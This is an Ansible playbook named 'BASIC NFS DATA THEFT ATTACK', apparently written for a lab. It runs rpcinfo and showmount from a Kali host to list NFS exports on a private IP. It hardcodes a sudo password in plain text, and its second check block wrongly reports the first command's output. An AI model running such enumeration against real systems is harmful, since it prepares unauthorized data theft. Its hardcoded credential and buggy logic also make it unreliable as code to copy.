---
- name: BASIC NFS DATA THEFT ATTACK
  hosts: thx_kali
  become: yes
  gather_facts: no
  vars:
    ansible_become_password: "Secure.00"
  tasks:
    - name: CHECKING SERVICE STATUS
      shell: rpcinfo -p 10.10.200.2
      register: result1
      ignore_errors: yes

    - name: Process CHECKING SERVICE STATUS
      block:
        - name: SUCCESS 1
          debug:
            msg: "ITS OPEN LETS GO MAN: {{ result1.stdout if result1.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT 
          debug:
            msg: "OKAY !! NO WAY: {{ result1.stderr if result1.stderr is defined else 'No stderr available' }}"
        - name: STOPPED
          fail:
            msg: "SOMETHING IS RIGHT, SEEMS SECURITY WORKS."

    - name: CHECKING ACTIVE MOUNTS
      shell: showmount -e 10.10.200.2
      register: result2
      ignore_errors: yes

    - name: Process CHECKING SERVICE STATUS
      block:
        - name: SUCCESS 1
          debug:
            msg: "ITS OPEN LETS GO MAN: {{ result1.stdout if result1.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT 
          debug:
            msg: "OKAY !! NO WAY: {{ result1.stderr if result1.stderr is defined else 'No stderr available' }}"
        - name: STOPPED
          fail:
            msg: "SOMETHING IS RIGHT, SEEMS SECURITY WORKS."